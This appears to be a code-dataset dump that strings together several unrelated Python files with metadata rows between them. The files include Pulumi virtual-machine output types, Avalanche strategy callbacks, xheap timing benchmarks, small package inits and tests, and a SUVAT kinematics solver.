boot_order: Optional[int] = None,
container_image_name: Optional[str] = None,
existing_volume_name: Optional[str] = None,
image: Optional[str] = None,
size: Optional[str] = None,
type: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "access_mode", access_mode)
pulumi.set(__self__, "auto_delete", auto_delete)
pulumi.set(__self__, "bus", bus)
pulumi.set(__self__, "hot_plug", hot_plug)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "storage_class_name", storage_class_name)
pulumi.set(__self__, "volume_mode", volume_mode)
pulumi.set(__self__, "volume_name", volume_name)
if boot_order is not None:
pulumi.set(__self__, "boot_order", boot_order)
if container_image_name is not None:
pulumi.set(__self__, "container_image_name", container_image_name)
if existing_volume_name is not None:
pulumi.set(__self__, "existing_volume_name", existing_volume_name)
if image is not None:
pulumi.set(__self__, "image", image)
if size is not None:
pulumi.set(__self__, "size", size)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> str:
return pulumi.get(self, "access_mode")
@property
@pulumi.getter(name="autoDelete")
def auto_delete(self) -> bool:
return pulumi.get(self, "auto_delete")
@property
@pulumi.getter
def bus(self) -> str:
return pulumi.get(self, "bus")
@property
@pulumi.getter(name="hotPlug")
def hot_plug(self) -> bool:
return pulumi.get(self, "hot_plug")
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageClassName")
def storage_class_name(self) -> str:
return pulumi.get(self, "storage_class_name")
@property
@pulumi.getter(name="volumeMode")
def volume_mode(self) -> str:
return pulumi.get(self, "volume_mode")
@property
@pulumi.getter(name="volumeName")
def volume_name(self) -> str:
return pulumi.get(self, "volume_name")
@property
@pulumi.getter(name="bootOrder")
def boot_order(self) -> Optional[int]:
return pulumi.get(self, "boot_order")
@property
@pulumi.getter(name="containerImageName")
def container_image_name(self) -> Optional[str]:
return pulumi.get(self, "container_image_name")
@property
@pulumi.getter(name="existingVolumeName")
def existing_volume_name(self) -> Optional[str]:
return pulumi.get(self, "existing_volume_name")
@property
@pulumi.getter
def image(self) -> Optional[str]:
return pulumi.get(self, "image")
@property
@pulumi.getter
def size(self) -> Optional[str]:
return pulumi.get(self, "size")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@pulumi.output_type
class GetVirtualMachineNetworkInterfaceResult(dict):
def __init__(__self__, *,
interface_name: str,
ip_address: str,
mac_address: str,
name: str,
type: str,
model: Optional[str] = None,
network_name: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "interface_name", interface_name)
pulumi.set(__self__, "ip_address", ip_address)
pulumi.set(__self__, "mac_address", mac_address)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
if model is not None:
pulumi.set(__self__, "model", model)
if network_name is not None:
pulumi.set(__self__, "network_name", network_name)
@property
@pulumi.getter(name="interfaceName")
def interface_name(self) -> str:
return pulumi.get(self, "interface_name")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> str:
return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> str:
return pulumi.get(self, "mac_address")
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter
def model(self) -> Optional[str]:
return pulumi.get(self, "model")
@property
@pulumi.getter(name="networkName")
def network_name(self) -> Optional[str]:
return pulumi.get(self, "network_name")
| 33.462712 | 150 | 0.612673 | 2,243 | 19,743 | 5.086045 | 0.056621 | 0.071353 | 0.063815 | 0.093268 | 0.838622 | 0.830207 | 0.824597 | 0.755698 | 0.740007 | 0.702402 | 0 | 0.004543 | 0.275338 | 19,743 | 589 | 151 | 33.519525 | 0.792829 | 0.018133 | 0 | 0.762004 | 1 | 0.006263 | 0.141279 | 0.025735 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148225 | false | 0 | 0.010438 | 0.108559 | 0.300626 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
2b544ccdbeab8763c4f68da4243d9ccb033c0ebf | 149 | py | Python | texar/custom/__init__.py | lunayach/texar-pytorch | ac3e334e491f524dd01654b07af030fa20c88b34 | [
"Apache-2.0"
] | null | null | null | texar/custom/__init__.py | lunayach/texar-pytorch | ac3e334e491f524dd01654b07af030fa20c88b34 | [
"Apache-2.0"
] | null | null | null | texar/custom/__init__.py | lunayach/texar-pytorch | ac3e334e491f524dd01654b07af030fa20c88b34 | [
"Apache-2.0"
] | null | null | null | """
Custom modules in Texar
"""
from texar.custom.activation import *
from texar.custom.initializers import *
from texar.custom.optimizers import *
| 18.625 | 39 | 0.771812 | 19 | 149 | 6.052632 | 0.473684 | 0.234783 | 0.391304 | 0.365217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127517 | 149 | 7 | 40 | 21.285714 | 0.884615 | 0.154362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
2b6ea728d291dcc4b621740603e4a9d56d652d3d | 2,521 | py | Python | avalanche/training/strategy_callbacks.py | lrzpellegrini/avalanche_pre_public | 522019a55ce08b92c1ec74b508a8ea6ae8751dfd | [
"MIT"
] | 12 | 2021-04-16T15:49:59.000Z | 2022-02-27T18:04:58.000Z | avalanche/training/strategy_callbacks.py | lrzpellegrini/avalanche_pre_public | 522019a55ce08b92c1ec74b508a8ea6ae8751dfd | [
"MIT"
] | null | null | null | avalanche/training/strategy_callbacks.py | lrzpellegrini/avalanche_pre_public | 522019a55ce08b92c1ec74b508a8ea6ae8751dfd | [
"MIT"
] | 2 | 2021-06-22T04:11:52.000Z | 2021-11-12T03:27:18.000Z | from abc import ABC
from typing import TypeVar, Generic
CallbackResult = TypeVar('CallbackResult')
class StrategyCallbacks(Generic[CallbackResult], ABC):
"""
Base class for all classes dealing with strategy callbacks. Implements all
the callbacks of the BaseStrategy with an empty function.
Subclasses must override the desired callbacks.
The main two direct subclasses are :class:`StrategyPlugin` and
:class:`StrategyLogger`. The first defines a common interface for all
plugins
"""
def __init__(self):
pass
def before_training(self, *args, **kwargs) -> CallbackResult:
pass
def before_training_exp(self, *args, **kwargs) -> CallbackResult:
pass
def adapt_train_dataset(self, *args, **kwargs) -> CallbackResult:
pass
def before_training_epoch(self, *args, **kwargs) -> CallbackResult:
pass
def before_training_iteration(self, *args, **kwargs) -> CallbackResult:
pass
def before_forward(self, *args, **kwargs) -> CallbackResult:
pass
def after_forward(self, *args, **kwargs) -> CallbackResult:
pass
def before_backward(self, *args, **kwargs) -> CallbackResult:
pass
def after_backward(self, *args, **kwargs) -> CallbackResult:
pass
def after_training_iteration(self, *args, **kwargs) -> CallbackResult:
pass
def before_update(self, *args, **kwargs) -> CallbackResult:
pass
def after_update(self, *args, **kwargs) -> CallbackResult:
pass
def after_training_epoch(self, *args, **kwargs) -> CallbackResult:
pass
def after_training_exp(self, *args, **kwargs) -> CallbackResult:
pass
def after_training(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval(self, *args, **kwargs) -> CallbackResult:
pass
def adapt_eval_dataset(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval_exp(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval_exp(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval_iteration(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval_forward(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval_forward(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval_iteration(self, *args, **kwargs) -> CallbackResult:
pass
| 27.107527 | 78 | 0.656089 | 273 | 2,521 | 5.904762 | 0.21978 | 0.104218 | 0.208437 | 0.416873 | 0.735732 | 0.735732 | 0.735732 | 0.652605 | 0.198511 | 0.126551 | 0 | 0 | 0.235621 | 2,521 | 92 | 79 | 27.402174 | 0.836533 | 0.127727 | 0 | 0.462963 | 0 | 0 | 0.006472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.462963 | false | 0.462963 | 0.037037 | 0 | 0.518519 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
2b6ed6d561c7b1a53286f82c95d887e08ddd61f7 | 323 | py | Python | POP1/worksheets/recursion/ex05/test_ex05.py | silvafj/BBK-MSCCS-2017-18 | d97b0f8e7434d19a1a4006989c32c4c1deb93842 | [
"MIT"
] | 1 | 2021-12-29T19:38:56.000Z | 2021-12-29T19:38:56.000Z | POP1/worksheets/recursion/ex05/test_ex05.py | silvafj/BBK-MSCCS-2017-18 | d97b0f8e7434d19a1a4006989c32c4c1deb93842 | [
"MIT"
] | null | null | null | POP1/worksheets/recursion/ex05/test_ex05.py | silvafj/BBK-MSCCS-2017-18 | d97b0f8e7434d19a1a4006989c32c4c1deb93842 | [
"MIT"
] | 2 | 2021-04-08T22:58:03.000Z | 2021-04-09T01:16:51.000Z | from reverse import reverse
def test_a():
assert reverse("1 2 3 0") == "0 3 2 1"
def test_b():
assert reverse("8 7 2 3 1 4 5 0") == "0 5 4 1 3 2 7 8"
def test_c():
assert reverse("1 0") == "0 1"
def test_d():
assert reverse("0") == "0"
def test_e():
assert reverse("1 2 3 4 5 6 7 8 9 0") == "0 9 8 7 6 5 4 3 2 1"
| 19 | 63 | 0.569659 | 79 | 323 | 2.265823 | 0.265823 | 0.195531 | 0.234637 | 0.167598 | 0.178771 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209205 | 0.260062 | 323 | 16 | 64 | 20.1875 | 0.539749 | 0 | 0 | 0 | 0 | 0 | 0.278638 | 0 | 0 | 0 | 0 | 0 | 0.454545 | 1 | 0.454545 | true | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
9952969db32253c61a8f4459cb3c98bab53109f8 | 14,762 | py | Python | test_xheap_time.py | srkunze/xheap | de98ecc5e009f9cd95aef84fd6202d8074df6f7d | [
"MIT"
] | 10 | 2016-01-31T06:00:44.000Z | 2021-08-11T09:46:04.000Z | test_xheap_time.py | srkunze/xheap | de98ecc5e009f9cd95aef84fd6202d8074df6f7d | [
"MIT"
] | 3 | 2016-02-02T20:02:48.000Z | 2018-04-10T00:30:29.000Z | test_xheap_time.py | srkunze/xheap | de98ecc5e009f9cd95aef84fd6202d8074df6f7d | [
"MIT"
] | 7 | 2016-01-31T04:40:37.000Z | 2019-07-16T13:36:38.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from timeit import repeat
class HeapTimeCase(object):
def time_init(self):
return [
'init',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from heapq import heapify;'
),
'heapify(values)',
1,
),
(
'Heap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import Heap;'
),
'Heap(values)',
1,
),
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
),
'RemovalHeap(values)',
1,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
),
'SortedList(values, load=100)',
1,
),
]
def time_pop(self):
return [
'pop',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from heapq import heapify, heappop;'
'heapify(values);'
),
'heappop(values)',
None,
),
(
'Heap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import Heap;'
'heap = Heap(values);'
),
'heap.pop()',
None,
),
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
'heap = RemovalHeap(values);'
),
'heap.pop()',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, load=100);'
),
'heap.pop(0)',
None,
),
]
def time_push(self):
return [
'push',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from heapq import heapify, heappush;'
'heap = list(values);'
'heapify(heap);'
'random.shuffle(values);'
'i = 0;'
),
'heappush(heap, values[i] + 1); i += 1',
None,
),
(
'Heap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import Heap;'
'heap = Heap(values);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
'heap = RemovalHeap(values);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, load=100);'
'random.shuffle(values);'
'i = 0;'
),
'heap.add(values[i] + 1); i += 1',
None,
),
]
class OrderHeapTimeCase(object):
def time_init(self):
return [
'init',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = [(-x, x) for x in range({size})];'
'random.shuffle(values);'
'from heapq import heapify;'
),
'heapify(values)',
1,
),
(
'OrderHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import OrderHeap;'
),
'OrderHeap(values, key=lambda x: -x)',
1,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import XHeap;'
),
'XHeap(values, key=lambda x: -x)',
1,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
),
'SortedList(values, key=lambda x: -x, load=100)',
1,
),
]
def time_pop(self):
return [
'pop',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = [(-x, x) for x in range({size})];'
'from heapq import heapify, heappop;'
'heapify(values);'
),
'heappop(values)[1]',
None,
),
(
'OrderHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'from xheap import OrderHeap;'
'heap = OrderHeap(values, key=lambda x: -x);'
),
'heap.pop()',
None,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'from xheap import XHeap;'
'heap = XHeap(values, key=lambda x: -x);'
),
'heap.pop()',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, key=lambda x: -x, load=100);'
),
'heap.pop(0)',
None,
),
]
def time_push(self):
return [
'push',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = [(-x, x) for x in range(0, {size} * 2, 2)];'
'random.shuffle(values);'
'from heapq import heapify, heappush;'
'heap = list(values);'
'heapify(heap);'
'random.shuffle(values);'
'i = 0;'
),
'heappush(heap, (values[i][0] - 1, values[i][1] + 1)); i += 1',
None,
),
(
'OrderHeap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import OrderHeap;'
'heap = OrderHeap(values, key=lambda x: -x);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import XHeap;'
'heap = XHeap(values, key=lambda x: -x);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, key=lambda x: -x, load=100);'
'random.shuffle(values);'
'i = 0;'
),
'heap.add(values[i] + 1); i += 1',
None,
),
]
class RemovalHeapTimeCase(object):
def time_remove(self):
return [
'remove',
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
'heap = RemovalHeap((-x, x) for x in values);'
'i = 0;'
'random.shuffle(values);'
),
(
'heap.remove((-values[i], values[i]));'
'i += 1;'
),
None,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import XHeap;'
'heap = XHeap(values, key=lambda x: -x);'
'i = 0;'
'random.shuffle(values);'
),
(
'heap.remove(values[i]);'
'i += 1;'
),
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, key=lambda x: -x, load=100);'
'i = 0;'
'random.shuffle(values);'
),
(
'heap.remove(values[i]);'
'i += 1;'
),
None,
),
]
initial_sizes = [10**3, 10**4, 10**5, 10**6]
repetitions = 5
def perform_time_configs(configs):
for _, setup, stmt, number in configs:
try:
yield [min(repeat(stmt.format(size=size), setup.format(size=size), number=(number or size), repeat=repetitions)) for size in initial_sizes]
except ImportError as exc:
pass
for htc in (HeapTimeCase(), OrderHeapTimeCase(), RemovalHeapTimeCase()):
config_methods = [getattr(htc, method) for method in dir(htc) if method.startswith('time_') and callable(getattr(htc, method))]
configs_list = [config_method() for config_method in config_methods]
align_label = max(len(cs[0]) for cs in configs_list)
align_module = max(len(c[0]) for cs in configs_list for c in cs)
for configs in configs_list:
label, configs = configs[0], configs[1:]
results = list(perform_time_configs(configs))
baseline_config = configs[0]
baseline_results = results[0]
for i, (config, results) in enumerate(zip(configs, results)):
printed_label = (label if i == 0 else '').ljust(align_label)
print(printed_label, config[0].ljust(align_module), ' '.join('{:5.2f} ({:5.2f}x)'.format(result*1000, result/baseline_result) for result, baseline_result in zip(results, baseline_results)))
print('--------------------------------------------------------------------')
print('--------------------------------------------------------------------')
| 32.515419 | 201 | 0.34013 | 1,057 | 14,762 | 4.71334 | 0.099338 | 0.088719 | 0.129667 | 0.119229 | 0.791449 | 0.788438 | 0.770373 | 0.768567 | 0.764954 | 0.739663 | 0 | 0.020881 | 0.526351 | 14,762 | 453 | 202 | 32.587196 | 0.691648 | 0.001423 | 0 | 0.754673 | 0 | 0.004673 | 0.347988 | 0.067033 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018692 | false | 0.002336 | 0.133178 | 0.016355 | 0.175234 | 0.009346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9967eacf0b6c8e7e6cf1510324705aaeaae06e1f | 247 | py | Python | hodolbot/controllers/__init__.py | solar0037/hodolbot | f758375efce2dede58d920d41cab4a8ad38d1d58 | [
"MIT"
] | null | null | null | hodolbot/controllers/__init__.py | solar0037/hodolbot | f758375efce2dede58d920d41cab4a8ad38d1d58 | [
"MIT"
] | 3 | 2021-08-02T01:59:04.000Z | 2021-08-02T01:59:15.000Z | hodolbot/controllers/__init__.py | solar0037/hodolbot | f758375efce2dede58d920d41cab4a8ad38d1d58 | [
"MIT"
] | null | null | null | from hodolbot.controllers.covid19 import covid19_handler
from hodolbot.controllers.ranking import programming_handler, anime_handler
from hodolbot.controllers.stock import stock_handler
from hodolbot.controllers.developer import developer_handler
| 49.4 | 75 | 0.894737 | 30 | 247 | 7.2 | 0.366667 | 0.222222 | 0.425926 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017391 | 0.068826 | 247 | 4 | 76 | 61.75 | 0.921739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5a91b155529000afffed13a83fae9357a753e598 | 11,379 | py | Python | src/Suvat.py | rustedorc/Toms-Calc | 263a055cf967e6e9e077e5d300c581c20c8e2f52 | [
"MIT"
] | 3 | 2020-11-25T19:25:22.000Z | 2020-11-26T22:18:20.000Z | src/Suvat.py | rustedorc/SUVAT | 263a055cf967e6e9e077e5d300c581c20c8e2f52 | [
"MIT"
] | null | null | null | src/Suvat.py | rustedorc/SUVAT | 263a055cf967e6e9e077e5d300c581c20c8e2f52 | [
"MIT"
] | null | null | null | from math import sqrt
class SUVAT :
'''
v = u + at DONE
v**2 = u**2 + 2as DONE
s = ut + (1/2)at**2 DONE KINDA
s = vt - (1/2)at**2 DONE KINDA
s = (1/2)(u + v)t DONE KINDA
Find logic GETTING THERE
'''
def __init__(self, S=None, U=None, V=None, A=None, T=None) :
self.S = S
self.U = U
self.V = V
self.A = A
self.T = T
def v_equals_u_plus_at(self) :
if (self.V is None) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
self.V = self.U + (self.A * self.T)
return self.V
elif (self.U is None) and (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
self.U = self.V - (self.A * self.T)
return self.U
elif (self.A is None) and (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.T) is int or type(self.T) is float) :
self.A = (self.V - self.U) / self.T
return self.A
elif (self.T is None) and (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.U) is int or type(self.U) is float) :
self.T = (self.V - self.U) / self.A
return self.T
else :
pass
def v_squared_equals_u_squared_plus_2as(self) :
if (self.V is None) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.S) is int or type(self.S) is float) :
V_squared = (self.U ** 2) + (2 * self.A + self.S)
self.V = sqrt(abs(V_squared))
return self.V
elif (self.U is None) and (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.S) is int or type(self.S) is float) :
U_squared = (self.V ** 2) - (2 * self.A * self.S)
self.U = sqrt(abs(U_squared))
return self.U
elif (self.S is None) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.V) is int or type(self.V) is float) :
self.S = ((self.V ** 2) - (self.U ** 2)) / (2 * self.A)
return self.S
elif (self.A is None) and (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.S) is int or type(self.S) is float) :
self.A = ((self.V ** 2) - (self.U ** 2)) / (2 * self.S)
return self.A
else:
pass
def s_equals_ut_plus_half_at_squared(self) :
if (self.S is None) and (type(self.U) is int or type(self.U) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
self.S = (self.U * self.T) + (0.5 * self.A * (self.T ** 2))
return self.S
elif (self.U is None) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
self.U = (self.S -(self.A * (self.T ** 2))) / (2 * self.T)
return self.U
elif (self.A is None) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.U) is int or type(self.U) is float) :
self.A = (2 * (self.S - (self.U * self.T))) / (self.T ** 2)
return self.A
elif (self.T is None) and (type(self.S) is int or type(self.S) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) :
self.T = sqrt(abs((2 * self.A * self.S) + (self.U ** 2) - self.U)) / self.A
return self.T
else:
pass
def s_equals_vt_minus_half_at_squared(self) :
if (self.S is None) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
self.S = (self.V * self.T) - (0.5 * self.A * (self.T ** 2))
return self.S
elif (self.V is None) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
self.V = (self.S + (self.A * (self.T ** 2))) / (2 * self.T)
return self.V
elif (self.A is None) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.S) is int or type(self.S) is float) :
self.A = (2 * ((self.V * self.T) - self.S)) / (self.T ** 2)
return self.A
elif (self.T is None) and (type(self.V) is int or type(self.V) is float) and (type(self.S) is int or type(self.S) is float) and (type(self.A) is int or type(self.A) is float) :
self.T = (self.V - sqrt(abs((self.V ** 2) - (2 * self.A * self.S))))
return self.T
else:
pass
def s_equals_half_u_plus_v_t(self) :
if (self.S is None) and (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) :
self.S = (self.T / 2) * (self.U + self.V)
return self.S
elif (self.U is None) and (type(self.S) is int or type(self.S) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) :
self.U = ((2 * self.S) / self.T) + self.V
return self.U
elif (self.V is None) and (type(self.U) is int or type(self.U) is float) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) :
self.V = ((2 * self.S) / self.T) - self.U
return self.V
elif (self.T is None) and (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.S) is int or type(self.S) is float) :
self.T = (2 * self.S) / (self.U + self.V)
return self.T
else:
pass
def Find(self) :
while type(self.S) is not float:
print("check 1")
self.v_squared_equals_u_squared_plus_2as()
self.s_equals_ut_plus_half_at_squared()
self.s_equals_half_u_plus_v_t()
self.s_equals_vt_minus_half_at_squared()
print("check 2")
while type(self.U) is not float:
self.s_equals_ut_plus_half_at_squared()
self.v_equals_u_plus_at()
self.v_squared_equals_u_squared_plus_2as()
self.s_equals_half_u_plus_v_t()
while type(self.V) is not float:
self.v_equals_u_plus_at()
self.s_equals_half_u_plus_v_t()
self.s_equals_vt_minus_half_at_squared()
self.v_squared_equals_u_squared_plus_2as()
while type(self.A) is not float:
self.v_equals_u_plus_at()
self.v_squared_equals_u_squared_plus_2as()
self.s_equals_ut_plus_half_at_squared()
self.s_equals_vt_minus_half_at_squared()
while type(self.T) is not float:
self.v_equals_u_plus_at()
self.s_equals_ut_plus_half_at_squared()
self.s_equals_vt_minus_half_at_squared()
self.s_equals_half_u_plus_v_t()
return None
# if (find.lower() == 'v') and (self.V is None) :
# if (type(self.U) is int or type(self.U) is float) and (type(self.S) is int or type(self.S) is float) and (type(self.A) is int or type(self.A) is float) :
# return round(self.v_squared_equals_u_squared_plus_2as(),1)
# elif (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.v_equals_u_plus_at(),2)
# else :
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 's') and (self.S is None) :
# if (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.s_equals_half_u_plus_v_t(),1)
# elif (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.s_equals_ut_plus_half_at_squared(),2)
# elif (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.s_equals_vt_minus_half_at_squared(),2)
# else :
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 't') and (self.T is None) :
# if (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) :
# return round(self.v_equals_u_plus_at(),2)
# else :
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 'u') and (self.U is None) :
# if (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.v_equals_u_plus_at(),2)
